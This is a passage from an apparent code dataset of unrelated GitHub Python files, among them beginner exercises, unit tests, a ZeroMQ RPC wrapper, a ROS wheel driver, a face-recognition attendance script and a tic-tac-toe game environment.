'look','want','give','use','find','tell','ask','work','seem','feel','leave','call']\n\nfor letter, words in groupby(sorted(word_list), key=itemgetter(0)): # the key for sorting is the first character in the element\n    print(letter) # print the key\n    for word in words: # then print the words that belong to it\n        print(word)\n    \n\n41. Write a Python program to create multiple lists. \n'''\n\nobj = {} # empty dictionary\nfor i in range(1, 11): # set the number of lists to be created\n    obj[str(i)] = [] # create empty lists in the 'obj' dictionary \nprint(obj)","repo_name":"LBri/Exs","sub_path":"cv_37.py","file_name":"cv_37.py","file_ext":"py","file_size_in_byte":890,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"19513061560","text":"import unittest\nfrom typing import List\n\n\nclass Solution:\n    def numsSameConsecDiff(self, N: int, K: int) -> List[int]:\n        if N == 1:\n            return list(range(10))\n        if K == 0:\n            nums = []\n            for i in range(1, 10):\n                num = ''\n                for _ in range(N):\n                    num += str(i)\n                nums.append(int(num))\n            return nums\n        nums = []\n        for i in range(1, 10):\n            self.dfs(N-1, K, i, nums)\n        return nums\n\n    def dfs(self, N: int, K: int, num: int, nums: List[int]) -> None:\n        if N == 0:\n            nums.append(num)\n        else:\n            last_digit = num % 10\n            if last_digit+K < 10:\n                self.dfs(N-1, K, num*10+last_digit+K, nums)\n            if last_digit >= K and K != 0:\n                self.dfs(N-1, K, num*10+last_digit-K, nums)\n\n\nclass TestNumsSameConsecDiff(unittest.TestCase):\n    def setUp(self):\n        self.sol = Solution()\n\n    def testNumsSameConsecDiff_1(self):\n        n = 3\n        k = 7\n\n        nums = self.sol.numsSameConsecDiff(n, k)\n        nums.sort()\n\n        self.assertEqual(nums, [181, 292, 707, 818, 929])\n\n    def testNumsSameConsecDiff_2(self):\n        n = 2\n        k = 1\n\n        nums = self.sol.numsSameConsecDiff(n, k)\n        nums.sort()\n\n        self.assertEqual(nums, [10, 12, 21, 23, 32, 34, 43,\n                                45, 54, 56, 65, 67, 76, 78,\n                                87, 89, 98])\n\n    def testNumsSameConsecDiff_3(self):\n        n = 3\n        k = 0\n\n        nums = self.sol.numsSameConsecDiff(n, k)\n\n        self.assertEqual(nums, [111, 222, 333, 444, 555,\n                                666, 777, 888, 999])\n\n    def testNumsSameConsecDiff_4(self):\n        n = 1\n        k = 0\n\n        nums = self.sol.numsSameConsecDiff(n, k)\n\n        self.assertEqual(nums, [0, 1, 2, 3, 4, 5, 6, 7, 8, 9])\n\n    def testNumsSameConsecDiff_5(self):\n        n = 3\n        k = 3\n\n        nums = 
self.sol.numsSameConsecDiff(n, k)\n        nums.sort()\n\n        self.assertEqual(nums, [141, 147, 252, 258, 303, 363,\n                                369, 414, 474, 525, 585, 630,\n                                636, 696, 741, 747, 852, 858,\n                                963, 969])\n\n\nif __name__ == \"__main__\":\n    unittest.main()\n","repo_name":"brigitteunger/katas","sub_path":"test_numbers_with_same_consecutive_differences.py","file_name":"test_numbers_with_same_consecutive_differences.py","file_ext":"py","file_size_in_byte":2314,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"72086489033","text":"import zmq.green as zmq\nfrom spider.util.retry import retry\nfrom spider.protocol import Message\n\n\nclass BaseSocket(object):\n    def __init__(self, socket_type):\n        self.ctx = zmq.Context()\n        self.socket = self.ctx.socket(socket_type)\n\n        self.socket.setsockopt(zmq.TCP_KEEPALIVE, 1)\n        self.socket.setsockopt(zmq.TCP_KEEPALIVE_IDLE, 30)\n\n    @retry()\n    def send(self, msg: Message):\n        resp = self.socket.send(msg.serialize().encode('utf8'))\n        print(resp)\n\n    @retry()\n    def send2client(self, msg: Message):\n        self.socket.send_multipart([msg.worker_id, msg.serialize()], zmq.NOBLOCK)\n\n    def recv_from_client(self):\n        data = self.socket.recv_multipart()\n        node_id = data[0]\n        msg = Message.unserialize(data[1])\n        return bytes(node_id).decode('utf8'), msg\n\n    @retry()\n    def recv(self) -> Message:\n        data = self.socket.recv()\n        msg = Message.unserialize(data)\n        return msg\n\n\nclass Server(BaseSocket):\n    def __init__(self, host, port):\n        super(Server, self).__init__(zmq.ROUTER)\n        if port == 0:\n            self.socket.bind_to_random_port(f\"tcp://{host}\")\n        else:\n            print(\"server\", host, port)\n            self.socket.bind(f\"tcp://{host}:{port}\")\n        self.port = port\n\n\nclass Client(BaseSocket):\n    def __init__(self, host, port: str, identity: str):\n        # the DEALER socket needs an identity so the server can identify the client\n        super(Client, self).__init__(zmq.DEALER)\n        self.socket.setsockopt(zmq.IDENTITY, identity.encode('utf8'))\n        self.socket.connect(\"tcp://%s:%s\" % (host, port))\n\n\nif __name__ == '__main__':\n    # c = Server(host='127.0.0.1', port='7777')\n    # print(c.recv_from_client())\n\n    c = Client(host='127.0.0.1', port='7777', identity='test')\n    from protocol import MessageTypeEnum\n\n    c.send(Message(m_type=MessageTypeEnum.WORKER, data={'1': 'test'}, client_id='a', timestamp=1))\n","repo_name":"buptwanglong/spider","sub_path":"spider/util/zmqrpc.py","file_name":"zmqrpc.py","file_ext":"py","file_size_in_byte":1928,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4685025769","text":"#!/usr/bin/env python3\n# -*- coding: utf-8 -*-\n\"\"\"\nCreated on Fri Oct 28 16:17:09 2022\n\n@author: marcinskic\n\"\"\"\n\nimport pandas as pd\nimport numpy as np\nimport matplotlib.pyplot as plt\nfrom sklearn.linear_model import LinearRegression\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.metrics import mean_absolute_percentage_error, mean_squared_error, mean_absolute_error\n\n#TASK 1\ndata_frame = pd.read_csv(\"surgical.csv\")\ndata = data_frame.values\ndata_columns = np.array(data_frame.columns)\n\nchange_factors = data.mean(axis=0)/data.std(axis=0)\ncolumnWithBiggestChangeFactor = data_columns[change_factors==change_factors.max()][0]\nprint(\"Column with the highest coefficient of variation: {}\".format(columnWithBiggestChangeFactor))\n\n#TASK 2\nfig, ax = plt.subplots(1,2,figsize=(10,5))\n\nX = data[:,:-1]\ny = 
data[:,-1]\nax[0].hist(y)\nax[0].set_title(\"Histogram\")\nax[1].boxplot(y)\nax[1].set_title(\"Boxplot\")\nplt.show()\n\n#TASK 3\nX_train, X_test, y_train, y_test = train_test_split(X,y,test_size=0.2,random_state=2022,shuffle=False)\nlinReg = LinearRegression()\nlinReg.fit(X_train,y_train)\nweights = linReg.coef_\nweights_names = data_columns[:-1]\n\nmask_of_highest_weight = weights==weights.max()\n\nprint(\"The most influential variable is: {} and its weight is: {}\".format(weights_names[mask_of_highest_weight][0],weights[mask_of_highest_weight][0]))\n\n#TASK 4\ny_pred = linReg.predict(X_test)\nmape = mean_absolute_percentage_error(y_test, y_pred)\nmse = mean_squared_error(y_test,y_pred)\nmae = mean_absolute_error(y_test,y_pred)\n\nprint(\"Mean absolute percentage error: {}\".format(mape))\nprint(\"Mean absolute error: {}\".format(mae))\nprint(\"Mean squared error: {}\".format(mse))\n\n#EXTRA\nminval = min(y_test.min(),y_pred.min())\nmaxval = max(y_test.max(),y_pred.max())\n\nplt.scatter(y_test,y_pred)\nplt.plot([minval,maxval],[minval,maxval])\nplt.xlabel('y_test')\nplt.ylabel('y_pred')\nplt.show()","repo_name":"forever0424/fifth-semester","sub_path":"ai-in-python/Test1/code.py","file_name":"code.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"27"} +{"seq_id":"3446409890","text":"#!/usr/bin/env python3\n\"\"\"\nATTOM API\nhttps://api.developer.attomdata.com\n\"\"\"\nimport copy\nimport requests\nfrom api import secrets\nfrom api import defaults\n\nURL = 'https://search.onboard-apis.com/propertyapi/v1.0.0'\nATTOM_URL = 'https://api.gateway.attomdata.com/propertyapi/v1.0.0'\nHEADERS_DEFAULT = {\n    'Accept': 'application/json',\n}\nheaders = copy.deepcopy(HEADERS_DEFAULT)\nheaders['apikey'] = secrets.API_KEY\n\ndef ping():\n    \"\"\"\n    ping api example property/detail by id\n    \"\"\"\n    path = \"property/detail\"\n    params = \"id={}\".format(defaults.ID)\n    headers['apikey'] = defaults.API_KEY\n\n    url = \"{}/{}?{}\".format(URL, path, params)\n\n    r = requests.get(url, headers=headers)\n    return r.json()\n","repo_name":"johncoleman83/attom_python_client","sub_path":"api/api.py","file_name":"api.py","file_ext":"py","file_size_in_byte":689,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"4528795845","text":"# Task 
4 \r\n# Write a script that will compute and display the following expressions:\r\n\r\nfrom math import * \r\n# First example\r\nx = 10\r\na = pow(e, 10)\r\nc = round(a,2)\r\nprint(c)\r\n\r\n# Second example\r\nq = pow(sin(8),2)\r\ni = 5 + q\r\nw = log(i)\r\ny = pow(w, 1/6)\r\nz = round(y,2)\r\nprint(z)\r\n\r\n# Third example\r\n\r\n\r\n# Fourth example\r\n\r\n","repo_name":"PatrykJurczyk/Wizualizacja_Danych","sub_path":"Python Ćwiczenia 1/4.Zadanie_czwarte.py","file_name":"4.Zadanie_czwarte.py","file_ext":"py","file_size_in_byte":329,"program_lang":"python","lang":"pl","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"18070037873","text":"# Python imports\n\n# Lib imports\nimport gi\ngi.require_version('Gtk', '3.0')\nfrom gi.repository import Gtk\n\n# Application imports\nfrom mixins import CommonWidgetGeneratorMixin\nfrom mixins import CommonActionsMixin\n\n\n\n\nclass Replace(Gtk.Box, CommonWidgetGeneratorMixin, CommonActionsMixin):\n    def __init__(self):\n        super(Replace, self).__init__()\n        self._name = \"Replace\"\n\n        self.entry_from = Gtk.Entry()\n        self.entry_to = Gtk.Entry()\n\n        self.entry_from.set_hexpand(True)\n        self.entry_to.set_hexpand(True)\n        self.entry_from.set_placeholder_text(\"Replace From...\")\n        self.entry_to.set_placeholder_text(\"Replace To...\")\n\n        self.add_widgets([self.entry_from, self.entry_to])\n\n        self.set_spacing(20)\n        self.show_all()\n\n\n    def run(self):\n        fsub = self.entry_from.get_text()\n        tsub = self.entry_to.get_text()\n        to_changes = event_system.emit_and_await(\"get-to\")\n\n        if fsub and tsub:\n            new_collection = []\n            print(f\"From: {fsub}\\nTo: {tsub}\")\n            for name in to_changes:\n                new_collection.append(name.replace(fsub, tsub))\n\n            event_system.emit(\"set-to\", (new_collection,))\n            event_system.emit(\"update-to\")\n","repo_name":"maximstewart/BulkR","sub_path":"src/core/widgets/replace.py","file_name":"replace.py","file_ext":"py","file_size_in_byte":1271,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"11558516458","text":"# -*- coding: utf-8 -*-\n\nfrom parameterized import parameterized\n\nfrom tests.unittests.utils.base_test_case import BaseTestCase, request_context\nfrom tests.unittests.utils.payload.geokret_type import GeokretTypePayload\n\n\nclass TestGeokretyTypesCollection(BaseTestCase):\n    \"\"\"Test GeoKrety Types collection\"\"\"\n\n    @parameterized.expand([\n        [None],\n        ['admin'],\n        ['user_1'],\n        ['user_2'],\n    ])\n    @request_context\n    def test_geokrety_types_collection_has_right_number_of_items(self, username):\n        user = getattr(self, username) if username else None\n        GeokretTypePayload()\\\n            .get_collection(user=user)\\\n            .assertCount(5)\n","repo_name":"geokrety/geokrety-api","sub_path":"tests/unittests/api/geokrety_types/test_geokrety_types_collection.py","file_name":"test_geokrety_types_collection.py","file_ext":"py","file_size_in_byte":684,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"27"} +{"seq_id":"34058550708","text":"import os\r\nimport subprocess as sp\r\n\r\nMAJOR = 0\r\nMINOR = 4\r\nMICRO = 0\r\nISRELEASED = False\r\nVERSION = '%d.%d.%d' % (MAJOR, MINOR, MICRO)\r\n\r\n# Return the git revision as a string\r\n# taken from numpy/numpy\r\ndef git_version():\r\n    def _minimal_ext_cmd(cmd):\r\n        # construct minimal environment\r\n        env = {}\r\n        for k in ['SYSTEMROOT', 'PATH', 'HOME']:\r\n            v = os.environ.get(k)\r\n            if v is not None:\r\n                env[k] = v\r\n        # LANGUAGE is used on win32\r\n        env['LANGUAGE'] = 'C'\r\n        
env['LANG'] = 'C'\r\n env['LC_ALL'] = 'C'\r\n out = sp.Popen(cmd, stdout=sp.PIPE, stderr=sp.PIPE, env=env).communicate()[0]\r\n return out\r\n\r\n try:\r\n out = _minimal_ext_cmd(['git', 'rev-parse', 'HEAD'])\r\n GIT_REVISION = out.strip().decode('ascii')\r\n except OSError:\r\n GIT_REVISION = \"Unknown\"\r\n\r\n return GIT_REVISION\r\n\r\ndef _get_git_version():\r\n cwd = os.getcwd()\r\n\r\n # go to the main directory\r\n fdir = os.path.dirname(os.path.abspath(__file__))\r\n maindir = os.path.abspath(os.path.join(fdir, \"..\"))\r\n # maindir = fdir # os.path.join(fdir, \"..\")\r\n os.chdir(maindir)\r\n\r\n # get git version\r\n res = git_version()\r\n\r\n # restore the cwd\r\n os.chdir(cwd)\r\n return res\r\n\r\ndef get_version(build_version=False):\r\n if ISRELEASED:\r\n return VERSION\r\n\r\n # unreleased version\r\n GIT_REVISION = _get_git_version()\r\n if build_version:\r\n import datetime as dt\r\n date = dt.date.strftime(dt.datetime.now(), \"%Y%m%d%H%M%S\")\r\n return VERSION + \".dev\" + date\r\n else:\r\n return VERSION + \".dev0+\" + GIT_REVISION[:7]\r\n","repo_name":"xitorch/xitorch","sub_path":"xitorch/version.py","file_name":"version.py","file_ext":"py","file_size_in_byte":1655,"program_lang":"python","lang":"en","doc_type":"code","stars":123,"dataset":"github-code","pt":"27"} +{"seq_id":"73651306632","text":"#!/usr/bin/env python3\n\nimport rospy\nfrom duckietown_msgs.msg import WheelsCmdStamped, BoolStamped\nfrom wheels_driver.dagu_wheels_driver import DaguWheelsDriver\n\nfrom duckietown.dtros import DTROS, TopicType, NodeType\nfrom hardware_test_wheels import HardwareTestMotor, HardwareTestMotorSide\n\n\nclass WheelsDriverNode(DTROS):\n \"\"\"Node handling the motor velocities communication.\n\n Subscribes to the requested wheels commands (linear velocities, i.e. velocity for the left\n and the right wheels) and to an emergency stop flag.\n When the emergency flag `~emergency_stop` is set to `False` it actuates the wheel driver\n with the velocities received from `~wheels_cmd`. Publishes the execution of the commands\n to `~wheels_cmd_executed`.\n\n The emergency flag is `False` by default.\n\n Subscribers:\n ~wheels_cmd (:obj:`WheelsCmdStamped`): The requested wheel command\n ~emergency_stop (:obj:`BoolStamped`): Emergency stop. Can stop the actual execution of\n the wheel commands by the motors if set to `True`. Set to `False` for nominal\n operations.\n Publishers:\n ~wheels_cmd_executed (:obj:`WheelsCmdStamped`): Publishes the actual commands executed,\n i.e. 
when the emergency flag is `False` it publishes the requested command, and\n        when it is `True`: zero values for both motors.\n\n    \"\"\"\n\n    def __init__(self, node_name):\n        # Initialize the DTROS parent class\n        super(WheelsDriverNode, self).__init__(node_name=node_name, node_type=NodeType.DRIVER)\n\n        self.estop = False\n\n        # Setup the driver\n        self.driver = DaguWheelsDriver()\n\n        # Initialize the executed commands message\n        self.msg_wheels_cmd = WheelsCmdStamped()\n\n        # Publisher for wheels command with execution time\n        self.pub_wheels_cmd = rospy.Publisher(\n            \"~wheels_cmd_executed\", WheelsCmdStamped, queue_size=1, dt_topic_type=TopicType.DRIVER\n        )\n\n        # Subscribers\n        self.sub_topic = rospy.Subscriber(\"~wheels_cmd\", WheelsCmdStamped, self.wheels_cmd_cb, queue_size=1)\n        self.sub_e_stop = rospy.Subscriber(\"~emergency_stop\", BoolStamped, self.estop_cb, queue_size=1)\n\n        # # user hardware tests\n        self._hardware_test_left = HardwareTestMotor(HardwareTestMotorSide.LEFT, self.driver)\n        self._hardware_test_right = HardwareTestMotor(HardwareTestMotorSide.RIGHT, self.driver)\n\n        self.log(\"Initialized.\")\n\n    def wheels_cmd_cb(self, msg):\n        \"\"\"\n        Callback that sets wheels' speeds.\n\n        Creates the wheels' speed message and publishes it. If the\n        emergency stop flag is activated, publishes zero command.\n\n        Args:\n            msg (WheelsCmdStamped): velocity command\n        \"\"\"\n        if self.estop:\n            vel_left = 0.0\n            vel_right = 0.0\n        else:\n            vel_left = msg.vel_left\n            vel_right = msg.vel_right\n\n        self.driver.set_wheels_speed(left=vel_left, right=vel_right)\n        # Put the wheel commands in a message and publish\n        self.msg_wheels_cmd.header = msg.header\n        # Record the time the command was given to the wheels_driver\n        self.msg_wheels_cmd.header.stamp = rospy.get_rostime()\n        self.msg_wheels_cmd.vel_left = vel_left\n        self.msg_wheels_cmd.vel_right = vel_right\n        self.pub_wheels_cmd.publish(self.msg_wheels_cmd)\n\n    def estop_cb(self, msg):\n        \"\"\"\n        Callback that enables/disables emergency stop\n\n        Args:\n            msg (BoolStamped): emergency_stop flag\n        \"\"\"\n\n        self.estop = msg.data\n        if self.estop:\n            self.log(\"Emergency Stop Activated\")\n        else:\n            self.log(\"Emergency Stop Released\")\n\n    def on_shutdown(self):\n        \"\"\"\n        Shutdown procedure.\n\n        Publishes a zero velocity command at shutdown.\n        \"\"\"\n        self.driver.set_wheels_speed(left=0.0, right=0.0)\n\n\nif __name__ == \"__main__\":\n    # Initialize the node with rospy\n    node = WheelsDriverNode(node_name=\"wheels_driver_node\")\n    # Keep it spinning to keep the node alive\n    rospy.spin()\n","repo_name":"duckietown/dt-duckiebot-interface","sub_path":"packages/wheels_driver/src/wheels_driver_node.py","file_name":"wheels_driver_node.py","file_ext":"py","file_size_in_byte":4127,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"27"} +{"seq_id":"9670321963","text":"print('=====Computing the average=====')\nprint()\n\nx = int(input('Enter the number of data points: '))\ndata = []\ni = 1\nwhile i <= x:\n    score = float(input(\"Enter a value: \"))\n    data.append(score)\n    i += 1\n\nrata2 = sum(data)/x\nprint()\nprint(\"The average of the entered data is:\", rata2)","repo_name":"issacianmutiara/Issacian-Mutiara-Paska_I0320053_Tiffany-Bella_Tugas6","sub_path":"I0320053_Soal 2.py","file_name":"I0320053_Soal 2.py","file_ext":"py","file_size_in_byte":299,"program_lang":"python","lang":"id","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"3845828971","text":"import os\nfrom playsound import playsound\nfrom PIL 
import Image\nimport time, msvcrt\n\nclass gatx:\n    def __init__(self,name,sex,type,personality):\n        print (f'Generating a gatx named {name}, {sex}, of type {type}, and with a {personality} personality')\n        ## instance attributes\n        self.name = name\n        self.sex = sex\n        self.type = type\n        self.personality = personality\n    \n    \n    def maulla(self,maullidos):\n        \n        sum = 0\n        i= 1\n        #maullidos = int(maullidos)\n        while i <= maullidos:\n            sum = sum + 1\n            i = i + 1 \n            if self.personality == \"amigable\": \n                print (f\"Miaw {sum}\")\n                playsound ('recursos/sonidos/amigable.mp3')\n            elif self.personality == \"verguerx\":\n                print (f\"Iggggg {sum}\") \n                playsound ('recursos/sonidos/verguera.mp3')\n            elif self.personality == \"solitarix\":\n                print (f\"Meaw {sum}\") \n                playsound ('recursos/sonidos/solitario.mp3')\n            elif self.personality == \"jugueton(a)\":\n                print (f\"M i a u {sum}\") \n                playsound ('recursos/sonidos/jugueton.mp3')\n            elif self.personality == \"mamon(a)\":\n                print (f\"Miau, with disdain {sum}\") \n                playsound ('recursos/sonidos/mamon.mp3')\n\n    def camina(self, pasos):\n        if self.sex == \"macho\": \n            print(f\"Walking {pasos} steps\") \n            m = Image.open(\"recursos/imagenes/macho.jpg\")\n            m.show()\n        elif self.sex == \"hembra\":\n            print(f\"Walking {pasos} steps\") \n            h = Image.open(\"recursos/imagenes/hembra.jpg\")\n            h.show()\n        elif self.sex == \"te vale\":\n            print(f\"Walking {pasos} steps\") \n            alv = Image.open(\"recursos/imagenes/alv.jpg\")\n            alv = alv.convert('L')\n            alv.show()\n    \n    \n    def ronronea(self,ronroneo):\n        sum = 0\n        i= 1 \n        while i <= ronroneo:\n            sum = sum + 1\n            i = i + 1\n            print (f\"Prrr {sum}\") \n            playsound ('recursos/sonidos/gato_ronroneo.mp3')\n\n    def dormir(self):\n        t0 = time.time()\n        t0 = int(t0)\n        print(\"SLEEPING...\")\n        msvcrt.getch()\n        t1 = time.time()\n        t1 = int(t1)\n        print(f\"You slept for {t1-t0} seconds\")","repo_name":"MCrux25/no-xavier-named","sub_path":"Personal/programa_gatx/recursos/gato.py","file_name":"gato.py","file_ext":"py","file_size_in_byte":2459,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"43940561502","text":"# importing libraries\nimport cv2\nimport os\nimport pickle\nimport numpy as np\nimport cvzone\nimport face_recognition\nfrom datetime import datetime\nimport firebase_admin\nfrom firebase_admin import credentials\nfrom firebase_admin import db\nfrom firebase_admin import storage\n\n# firebase creds\ncred = credentials.Certificate(\"key.json\")\nfirebase_admin.initialize_app(cred,{\n    \"databaseURL\":'https://classcapture-1362b-default-rtdb.firebaseio.com/',\n    \"storageBucket\":'classcapture-1362b.appspot.com'\n})\n\nbucket = storage.bucket()\n\n# webcam settings\ncapture = cv2.VideoCapture(1)\ncapture.set(3, 640)\ncapture.set(4, 480)\n\n# background image\nbgImg = cv2.imread('Resources/background.png')\n\n# creating modes list to switch between different modes\nmodesFolderPath = 'Resources/Modes'\nmodesPathList = os.listdir(modesFolderPath)\nmodesList = []\nfor path in modesPathList:\n    modesList.append(cv2.imread(os.path.join(modesFolderPath,path)))\n\n# --- load the encoding file --- #\nprint(\"loading the encode file...\")\nfile = open('encodeFile.p','rb')\nencodingsWithIDs = pickle.load(file)\nfile.close()\nencodings,studentIDs = encodingsWithIDs\n# print(studentIDs) to test if IDs are fetched\nprint(\"encode file loaded\")\n\n# variables\nmodeType = 0\nframeCounter = 0\nimgStudent =[]\n# process\nwhile True:\n    success, img = capture.read()\n\n    # --- scaling down the image to reduce the 
computation power required --- #\n    imgSmall = cv2.resize(img,(0,0),None,0.25,0.25)\n    imgSmall = cv2.cvtColor(imgSmall, cv2.COLOR_BGR2RGB)\n\n    # finding out encodings in current frame\n    faceCurrFrame = face_recognition.face_locations(imgSmall)\n    encodeCurrFrame = face_recognition.face_encodings(imgSmall,faceCurrFrame)\n\n    # UI layout\n    bgImg[162:162+480,55:55+640] = img\n    bgImg[44:44+633,808:808+414] = modesList[modeType]\n\n    # if face in frame\n    if faceCurrFrame:\n        # matching the face with the encodings\n        for encodeFace,faceLocation in zip(encodeCurrFrame,faceCurrFrame):\n            matches = face_recognition.compare_faces(encodings,encodeFace)\n            faceDistance = face_recognition.face_distance(encodings,encodeFace)\n            # print('matches: ',matches)\n            # print('face Distance: ',faceDistance)\n\n            matchIndex = np.argmin(faceDistance)\n\n            if matches[matchIndex]:\n                # print(\"known face detected\")\n                # print(\"Id: \",studentIDs[matchIndex])\n                # --- bounding box info --- #\n                y1,x2,y2,x1 = faceLocation\n                y1,x2,y2,x1= y1 * 4, x2 * 4, y2 * 4, x1 * 4\n                bbox = 55+x1,162+y1,x2-x1,y2-y1\n                bgImg = cvzone.cornerRect(bgImg,bbox,rt=0)\n                # get id\n                id = studentIDs[matchIndex]\n                if frameCounter == 0:\n                    frameCounter = 1\n                    modeType=1\n        \n        if frameCounter!=0:\n            if frameCounter==1:\n                # get the student's data\n                studentInfo = db.reference(f'Students/{id}').get()\n                print(studentInfo)\n                \n                # get image from storage\n                blob = bucket.get_blob(f'Images/{id}.png')\n                array = np.frombuffer(blob.download_as_string(),np.uint8)\n                imgStudent = cv2.imdecode(array,cv2.IMREAD_COLOR)\n                \n                # update student attendance\n                dateTimeObj = datetime.strptime(studentInfo['last_attendance_time'],\"%Y-%m-%d %H:%M:%S\")\n                secondsElapsed = (datetime.now() - dateTimeObj).total_seconds()\n                print(secondsElapsed)\n                \n                if secondsElapsed>30: # change 30 secs to whichever hours you want the student attendance to update\n                    ref =db.reference(f'Students/{id}')\n                    studentInfo['total_attendance']+=1\n                    ref.child('total_attendance').set(studentInfo['total_attendance'])\n                    ref.child('last_attendance_time').set(datetime.now().strftime(\"%Y-%m-%d %H:%M:%S\"))\n                else:\n                    modeType=3\n                    frameCounter=0\n                    bgImg[44:44+633,808:808+414] = modesList[modeType]\n\n            \n            \n            # only do when mode type != 3\n            if modeType!=3:\n                # marked frame image\n                if 10<frameCounter<20:\n                    modeType=2\n                    bgImg[44:44+633,808:808+414] = modesList[modeType]\n\n                frameCounter+=1\n\n                if frameCounter>=20:\n                    frameCounter=0\n                    modeType=0\n                    studentInfo=[]\n                    imgStudent =[]\n                    bgImg[44:44+633,808:808+414] = modesList[modeType]\n        \n    else:\n        modeType=0\n        frameCounter=0\n        \n    \n    # webcam layout\n    # cv2.imshow(\"Webcam\", img)\n\n    # background layout\n    cv2.imshow(\"Background image\", bgImg)\n    cv2.waitKey(1)\n","repo_name":"yaksh1/Ai-Attendance","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":6700,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"27"} +{"seq_id":"17623971399","text":"import random\nimport copy\n\nclass TicTacToe3X3GamePlay:\n\n    def __init__(self):\n\n        # current state stores how 'X's and 'O's are placed on the board\n        self.currentState = [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0]\n\n        # 3 in a row, 3 in a column, 2 diagonals\n        self.winningCombination = [(0, 1, 2), (3, 4, 5), (6, 7, 8), (0, 3, 6), (1, 4, 7), (2, 5, 8), (0, 4, 8), (2, 4, 6)]\n\n        # some positions for rule-based bot to move on\n        self.cornerPosition = [0, 2, 6, 8]\n        self.middlePosition = 4\n        self.allPosition = [0, 1, 2, 3, 4, 5, 6, 7, 8]\n\n        # numbers to identify player X (DQN) and player O (rule-based)\n        self.playerXMark = 1.0\n        self.playerOMark = 0.0\n\n    # start a new game by resetting the board\n    def ResetGame 
(self):\n        self.currentState = [-1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0, -1.0]\n        return self.currentState\n\n    # Player X proceeds one step, then Player O\n    def ProceedGameGivenAction(self, playerXAction):\n\n        gameFinish = False\n        result = \"No Result\"\n\n        # if Player X makes an invalid move with the given action\n        if not self.IsBoardFreeOfSpaceGivenAction(self.currentState, playerXAction):\n            return None, \"Invalid Move\", True\n\n        # Player X proceeds with the action\n        self.ApplyActionToBoard (self.currentState, playerXAction, self.playerXMark)\n\n        # if player X wins\n        if(self.IsWinnerGivenPlayer(self.currentState, self.playerXMark)):\n            result = \"Win\"\n            gameFinish = True\n\n        # if a draw game\n        elif self.IsFullGame():\n            result = \"Draw\"\n            gameFinish = True\n\n        # if the game is not finished yet\n        else:\n            # player O proceeds\n            playerOAction = self.PlayerOProceedOneStep()\n\n            # Player O proceeds with the action\n            self.ApplyActionToBoard (self.currentState, playerOAction, self.playerOMark)\n\n            # if player O wins\n            if (self.IsWinnerGivenPlayer(self.currentState, self.playerOMark)):\n                result = \"Lose\"\n                gameFinish = True\n\n            # if a draw game\n            elif self.IsFullGame():\n                result = \"Draw\"\n                gameFinish = True\n\n        return self.currentState, result, gameFinish\n\n    # find out if player X/O is winner\n    def IsWinnerGivenPlayer(self, currentState, playerMark):\n        # check all winning combinations\n        for combination in self.winningCombination:\n            if (currentState[combination[0]] == currentState[combination[1]] == currentState[combination[2]] == playerMark):\n                return True\n        return False\n\n    # rule-based Player O strategy\n    def PlayerOProceedOneStep (self):\n        # check if Player O can win in the next move\n        for i in range(0,len(self.currentState)):\n            currentStateCopy = copy.deepcopy(self.currentState)\n            if self.IsBoardFreeOfSpaceGivenAction(currentStateCopy, i):\n                self.ApplyActionToBoard (currentStateCopy, i, self.playerOMark)\n                if self.IsWinnerGivenPlayer(currentStateCopy, self.playerOMark):\n                    return i\n        # check if Player X can win in the next move\n        for i in range(0,len(self.currentState)):\n            currentStateCopy = copy.deepcopy(self.currentState)\n            if self.IsBoardFreeOfSpaceGivenAction(currentStateCopy, i):\n                self.ApplyActionToBoard (currentStateCopy, i, self.playerXMark)\n                if self.IsWinnerGivenPlayer(currentStateCopy, self.playerXMark):\n                    return i\n\n        # rule priority (1) take the corner (2) take the middle (3) take the rest randomly\n        # (1) take the corner\n        action = self.RandomNextAction(self.cornerPosition)\n        if action is not None:\n            return action\n        # (2) take the middle\n        if self.IsBoardFreeOfSpaceGivenAction(self.currentState, self.middlePosition):\n            return self.middlePosition\n        # (3) take the rest randomly\n        return self.RandomNextAction(self.allPosition)\n\n    # check the board position is free for the action\n    def IsBoardFreeOfSpaceGivenAction (self, currentState, action):\n        return currentState[action] == -1.0\n\n    # check if the board is full (all nine positions, including index 0)\n    def IsFullGame(self):\n\n        for i in range(9):\n            if self.IsBoardFreeOfSpaceGivenAction(self.currentState, i):\n                return False\n        return True\n\n    def ApplyActionToBoard (self, currentState, index, move):\n        currentState[index] = move\n\n    # randomly pick the next action from the given positions\n    def RandomNextAction (self, positionList):\n        possibleActions = []\n        # find all possible actions\n        for index in positionList:\n            if self.IsBoardFreeOfSpaceGivenAction(self.currentState, index):\n                possibleActions.append(index)\n        # randomly choose one action from possibleActions\n        if 
